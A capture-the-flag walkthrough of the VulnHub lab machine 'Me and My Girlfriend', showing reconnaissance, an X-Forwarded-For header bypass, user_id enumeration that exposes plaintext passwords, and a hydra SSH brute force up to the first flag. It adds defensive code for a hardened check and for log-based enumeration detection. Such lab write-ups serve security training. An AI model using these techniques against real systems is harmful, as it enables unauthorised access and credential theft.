Me and My Girlfriend
Author: jason huawen
Target machine information
Name: Me and My Girlfriend: 1
Address: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
Identifying the target host's IP address
```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor
 192.168.56.100  08:00:27:61:8a:f1      1      60  PCS Systemtechnik GmbH
 192.168.56.254  08:00:27:87:26:b3      1      60  PCS Systemtechnik GmbH
```
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.254.
NMAP scan
```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 57e15658460433563dc34ba793ee2316 (DSA)
|   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
|   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
```
The NMAP scan shows that the target host has 2 open ports: 22 (ssh) and 80 (http).
Getting a shell
```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
```
The site can only be accessed locally, and the hint is to set x-forwarded-for in the request header. Burp Suite can be used to intercept the request and add x-forwarded-for: 127.0.0.1.

```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/robots.txt
User-Agent: *
Allow: /heyhoo.txt
```

```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/heyhoo.txt
Great! What you need now is reconn, attack and got the shell
```

With the header added, the page is obtained successfully.
However, modifying every request in Burp Suite is tedious; a browser plug-in (IP) can be used instead to forge the X-Forwarded-For field.
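The access check bypassed above fails because it decides on a header the client writes. The following is an added Python model of that check beside a hardened version; it is not the box's PHP code, and the TRUSTED_PROXIES address and the request dicts are constructed for the demo.

```python
# Added example (not the box's PHP): a Python model of the "local only"
# check. TRUSTED_PROXIES and the request dicts are constructed for the demo.
import ipaddress

TRUSTED_PROXIES = {"10.0.0.5"}  # constructed: the only reverse proxy we operate


def is_loopback(addr: str) -> bool:
    try:
        return ipaddress.ip_address(addr.strip()).is_loopback
    except ValueError:
        return False


def vulnerable_is_local(request: dict) -> bool:
    """Trusts a client-controlled header: any visitor who sends
    X-Forwarded-For: 127.0.0.1 passes, which is the bypass used above."""
    xff = request["headers"].get("X-Forwarded-For")
    if xff:
        return is_loopback(xff.split(",")[0])
    return is_loopback(request["remote_addr"])


def hardened_is_local(request: dict) -> bool:
    """Decides on the TCP peer address (REMOTE_ADDR). X-Forwarded-For is
    honoured only when the peer is our own reverse proxy, and then only the
    hop that proxy appended (the last entry); earlier entries are client data."""
    peer = request["remote_addr"]
    xff = request["headers"].get("X-Forwarded-For")
    if peer in TRUSTED_PROXIES and xff:
        return is_loopback(xff.split(",")[-1])
    return is_loopback(peer)


# Constructed requests mirroring the walkthrough's situation.
ATTACKER = {"remote_addr": "192.168.56.1",
            "headers": {"X-Forwarded-For": "127.0.0.1"}}
LOCAL = {"remote_addr": "127.0.0.1", "headers": {}}
VIA_PROXY = {"remote_addr": "10.0.0.5",  # client lied, proxy appended its real address
             "headers": {"X-Forwarded-For": "127.0.0.1, 192.168.56.1"}}

if __name__ == "__main__":
    for name, req in (("attacker", ATTACKER), ("local", LOCAL), ("via proxy", VIA_PROXY)):
        print(f"{name:10} vulnerable={vulnerable_is_local(req)} hardened={hardened_is_local(req)}")
```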
Judging from the URL, could there be a local file inclusion vulnerability?

```
http://192.168.56.254/index.php?page=login
```

But after testing, nothing was returned, though no error was reported either. Using the PHP filter wrapper did not succeed either:

```
http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index
```

Intercept the request with Burp Suite, save it to a file, and scan it with sqlmap to see whether there is a SQL injection vulnerability:

```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sqlmap -r req.txt --level=5
```

sqlmap did not find any SQL injection vulnerability.
Next, register a user named test and see what can be found. After logging in as test, note the URL:

```
http://192.168.56.254/index.php?page=dashboard&user_id=14
```

Let's see whether a horizontal privilege escalation attack is possible by modifying the user_id value. Changing user_id to 1 and viewing the profile:
Looking at the page source at this point, the user's plaintext password is actually present:

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Ceban Corp</title>

</head>
<body>

    <h2>Welcome To Ceban Corp</h2>
    <p>Inspiring The People To Great Again!</p>
    <hr>
    <p><a target="_blank" href="?page=dashboard">Dashboard</a> | <a target="_blank" href="?page=profile&user_id=14">Profile</a> | <a target="_blank" href="?page=logout">Logout</a></p>
    <hr>

    <form action="#" method="POST">
        <label for="name">Name</label>
        <input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
        <label for="username">Username</label>
        <input type="text" name="username" id="username" value="eweuhtandingan"><br>
        <label for="password">Password</label>
        <input type="password" name="password" id="password" value="skuyatuh"><br>
        <button disabled="disabled">Change</button>
    </form>
</body>
</html>
```
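From the defender's side, the user_id walk described here leaves a recognisable trace in the web server's access log: one client requesting the profile page with many distinct user_id values in a short span. The following is an added detection example, not part of the walkthrough; the Apache combined-format log lines, the 192.168.56.101 "normal" client and the window/threshold values are constructed assumptions.

```python
# Added detection example, not from the walkthrough: flag clients that walk
# through many distinct user_id values on the profile/dashboard pages. The
# log lines, the 192.168.56.101 client and window/threshold are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, user_id) for profile/dashboard requests, else None."""
    if not (m := LOG_RE.match(line)):
        return None
    url = urlsplit(m["path"])
    q = parse_qs(url.query)
    if url.path != "/index.php" or q.get("page", [""])[0] not in ("profile", "dashboard"):
        return None
    uid = q.get("user_id")
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), uid[0]) if uid else None


def detect_enumeration(lines, window=timedelta(minutes=5), threshold=5):
    """{ip: sorted user_ids} for clients hitting >= threshold distinct ids within window."""
    events = defaultdict(list)
    for ip, ts, uid in filter(None, map(parse_line, lines)):
        events[ip].append((ts, uid))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            ids = {uid for ts, uid in evs[i:] if ts - start <= window}
            if len(ids) >= threshold:
                flagged[ip] = sorted(ids, key=int)  # user_id is numeric on this app
                break
    return flagged


SAMPLE_LOG = """\
192.168.56.1 - - [08/Apr/2023:21:00:01 -0400] "GET /index.php?page=dashboard&user_id=14 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:21:00:09 -0400] "GET /index.php?page=profile&user_id=1 HTTP/1.1" 200 901 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:21:00:15 -0400] "GET /index.php?page=profile&user_id=2 HTTP/1.1" 200 899 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:21:00:21 -0400] "GET /index.php?page=profile&user_id=3 HTTP/1.1" 200 897 "-" "Mozilla/5.0"
192.168.56.1 - - [08/Apr/2023:21:00:27 -0400] "GET /index.php?page=profile&user_id=4 HTTP/1.1" 200 903 "-" "Mozilla/5.0"
192.168.56.101 - - [08/Apr/2023:21:01:00 -0400] "GET /index.php?page=profile&user_id=14 HTTP/1.1" 200 901 "-" "Mozilla/5.0"
192.168.56.101 - - [08/Apr/2023:21:02:00 -0400] "GET /index.php?page=dashboard&user_id=14 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print(detect_enumeration(SAMPLE_LOG.splitlines()))  # {'192.168.56.1': ['1', '2', '3', '4', '14']}
```

A legitimate user who only ever opens their own profile (one distinct user_id) never reaches the threshold, so the rule keys on breadth of ids rather than request volume.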
Are this username and password also the SSH username and password? Trying them turns out not to work, so instead collect every user's username and password (enumerating user_id from 1 upwards until nothing is returned):

```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh eweuhtandingan@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
eweuhtandingan@192.168.56.254's password:
Permission denied, please try again.
eweuhtandingan@192.168.56.254's password:
```
```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat users.dict
eweuhtandingan
aingmaung
sundatea
sedihaingmah
alice

┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat pass.dict
skuyatuh
qwerty!!!
indONEsia
cedihhihihi
4lic3
```
```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.254:22/
[22][ssh] host: 192.168.56.254   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20
```
```
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh alice@192.168.56.254
alice@192.168.56.254's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
alice@gfriEND:~$ ls -alh
total 32K
drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
-rw------- 1 alice alice   10 Dec 13  2019 .bash_history
-rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
-rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
-rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile
alice@gfriEND:~$ cat .bash_history
exit
exit
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -alh
total 16K
drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .
drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 ..
-rw-r--r-- 1 root  root   306 Dec 13  2019 flag1.txt
-rw-rw-r-- 1 alice alice  119 Dec 13  2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:~/.my_secret$ cd /home
alice@gfriEND:/home$ ls -alh
total 24K
drwxr-xr-x  6 root           root           4.0K Dec 13  2019 .
drwxr-xr-x 22 root           root           4.0K Dec 13  2019 ..
drwxr-xr-x  2 aingmaung      aingmaung      4.0K Dec 13  2019 aingmaung
drwxr-xr-x  4 alice          alice          4.0K Dec 13  2019 alice
drwxr-xr-x  2 eweuhtandingan eweuhtandingan 4.0K Dec 13  2019 eweuhtandingan
drwxr-xr-x  2 sundatea       sundatea       4.0K Dec 13  2019 sundatea
```
With this, the first flag is obtained.
Privilege escalation

```
alice@gfriEND:/var/www/html$ cd config
alice@gfriEND:/var/www/html/config$ ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Dec 13  2019 .
drwxr-xr-x 5 root root 4.0K Dec 13  2019 ..
-rw-rw-r-- 1 root root   88 Dec 13  2019 config.php
alice@gfriEND:/var/www/html/config$ cat config.php
```